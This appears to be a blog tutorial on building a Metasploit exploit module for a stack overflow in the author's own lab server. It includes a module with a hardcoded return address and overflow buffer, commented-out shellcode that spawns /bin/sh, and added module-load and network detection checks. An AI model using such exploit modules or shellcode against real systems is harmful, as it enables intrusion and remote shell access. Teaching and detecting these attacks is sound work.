Stack overflow attacks with Metasploit - 4
2014-11-22 10:23
Now that we have a vulnerability, we can attack it. First we need to understand Metasploit's exploit modules; see
http://www.offensive-security.com/metasploit-unleashed/Exploit_Development
Metasploit itself is extremely powerful; we will not introduce it further here.
First we need to add an exploit module for this vulnerability. We modify the bundled sample directly:
```shell
root@bt:~/.msf4/modules# mkdir exploits
root@bt:~/.msf4/modules# cd exploits
root@bt:~/.msf4/modules/exploits# mkdir linux
root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb myvictim.rb
root@bt:~/.msf4/modules/exploits/linux# ls
myvictim.rb  myvictimserver.rb  proftp_sreplace.rb
```
Then look at myvictim.rb:
```ruby
##
# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

module Msf

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Exploits::Sample < Msf::Exploit::Remote

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sample exploit',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in an TCP server that has a parsing bug.
      },
      'Author'         => 'skape',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Windows All
          [
            'Windows Universal',
            {
              'Platform' => 'win',
              'Ret'      => 0x41424344
            }
          ],
        ],
      'DefaultTarget'  => 0))
  end

  #
  # The sample exploit just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends 1024 A's
  # followed by the fake return address and then the payload.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf  = "A" * 1024
    buf += [ target.ret ].pack('V')
    buf += payload.encoded

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end

end

end
```
Then we need to add it into Metasploit by running reload_all:
```text
       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > reload_all
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my
```
The module we just added is not listed here (tab completion only offers the mysql modules and the existing myvictimserver), which means there is a problem with the module and it must be modified. The fix is to define the class at top level as Metasploit3 instead of wrapping Exploits::Sample inside module Msf, because that constant is what the 4.x loader looks for when it registers a module file. The modified module is as follows:
```ruby
##
# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MyVictimSever',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in an TCP server that has a stackoverflow bug.
      },
      'Author'         => 'bai',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 116,
          # 'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: the victim server running on Linux
          [
            'MyVictimSever run on linux',
            {
              'Platform' => 'Linux',
              'Ret'      => 0xbffff4a4
            }
          ],
        ],
      'DefaultTarget'  => 0))
  end

  #
  # The check method just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends the fake
  # return address, then the payload, then 100 more copies of the return
  # address.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf = ""
    #buf = "\x90" * 15
    #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";
    buf += "\xa4\xf4\xff\xbf"                       # target.ret, little-endian
    buf += payload.encoded
    buf += [].fill(target.ret, 0, 100).pack('V*')   # 100 copies of target.ret

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end

end
```
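An added pre-flight check, my own code rather than anything from the original post or from Metasploit, that tests a module source for the two things changed above: the 4.x loader only registers a file that defines a top-level class named Metasploit3 or Metasploit4, and the documentation sample instead wraps its class in module Msf as Exploits::Sample. The two source excerpts are constructed from the listings above, with the method bodies left out.

```ruby
# Added example, not part of the original post or of Metasploit itself.
# Metasploit 4.x registers a module only if evaluating the file defines a
# class called Metasploit3 (or Metasploit4) at the top level. The sample
# module above instead wraps "class Exploits::Sample" inside "module Msf",
# so reload_all silently skips it. This check catches that before reloading.
def module_load_problems(source)
  problems = []
  unless source =~ /^\s*class\s+Metasploit[34]\s*<\s*Msf::Exploit::Remote\b/
    problems << "no top-level 'class Metasploit3 < Msf::Exploit::Remote'"
  end
  if source =~ /^\s*module\s+Msf\s*$/
    problems << "class is wrapped in 'module Msf'; the loader will not find it"
  end
  unless source.include?("require 'msf/core'")
    problems << "missing require 'msf/core'"
  end
  problems
end

# Constructed excerpts of the two versions shown above (bodies omitted).
SAMPLE_HEADER = <<~RUBY
  require 'msf/core'
  module Msf
  class Exploits::Sample < Msf::Exploit::Remote
    include Exploit::Remote::Tcp
  end
  end
RUBY

FIXED_HEADER = <<~RUBY
  require 'msf/core'
  class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
    include Exploit::Remote::Tcp
  end
RUBY

if __FILE__ == $0
  { 'sample.rb' => SAMPLE_HEADER, 'myvictimserver.rb' => FIXED_HEADER }.each do |name, src|
    issues = module_load_problems(src)
    puts "#{name}: #{issues.empty? ? 'OK' : issues.join('; ')}"
  end
end
```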
Now we can find the module:
```text
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim
use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver
msf > use exploit/linux/my
```
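An added defender-side check, my own code and not part of the original post, for the buffer layout the exploit method above sends: its trailer is 100 copies of target.ret packed with 'V*', which on the wire is a long run of one repeated 4-byte value inside the stack address range. The sample traffic is constructed from that layout, and the 0xbf000000..0xbfffffff range is an assumption matching a classic 32-bit Linux stack.

```ruby
# Added example, not part of the original post. The exploit method above ends
# its buffer with [].fill(target.ret, 0, 100).pack('V*'): 100 identical 32-bit
# little-endian words pointing into the stack. Seen from the wire, that is a
# long run of one repeated 4-byte value inside the stack address range, which
# is a usable detection signature for this kind of stack-smashing payload.
STACK_RANGE = (0xbf000000..0xbfffffff)  # assumption: classic 32-bit Linux stack

# Try all four byte alignments, unpack as 'V*' words, and return the longest
# run of one identical in-range word as [address, count] ([nil, 0] if none).
def longest_stack_ptr_run(data, range = STACK_RANGE)
  best = [nil, 0]
  4.times do |offset|
    words = (data.byteslice(offset..-1) || "").unpack('V*')
    run_addr, run_len = nil, 0
    words.each do |w|
      run_addr, run_len = (w == run_addr ? [run_addr, run_len + 1] : [w, 1])
      best = [run_addr, run_len] if range.cover?(run_addr) && run_len > best[1]
    end
  end
  best
end

# Flag a payload once the repeated-pointer run reaches min_run words.
def suspicious?(data, min_run: 8)
  longest_stack_ptr_run(data)[1] >= min_run
end

# Constructed sample traffic: the module's layout (ret, payload, 100 * ret)
# next to a benign request that merely contains one stack-looking pointer.
RET          = 0xbffff4a4                       # target.ret from the module
FAKE_PAYLOAD = "\x90".b * 116                   # stands in for payload.encoded
EXPLOIT_LIKE = [RET].pack('V') + FAKE_PAYLOAD + [].fill(RET, 0, 100).pack('V*')
BENIGN       = "GET /index.html HTTP/1.0\r\n".b + [RET].pack('V') + "\r\n".b

if __FILE__ == $0
  { 'exploit-like' => EXPLOIT_LIKE, 'benign' => BENIGN }.each do |name, data|
    addr, count = longest_stack_ptr_run(data)
    puts format("%-12s run=%3d addr=%s suspicious=%s", name, count,
                addr ? format("0x%08x", addr) : "-", suspicious?(data))
  end
end
```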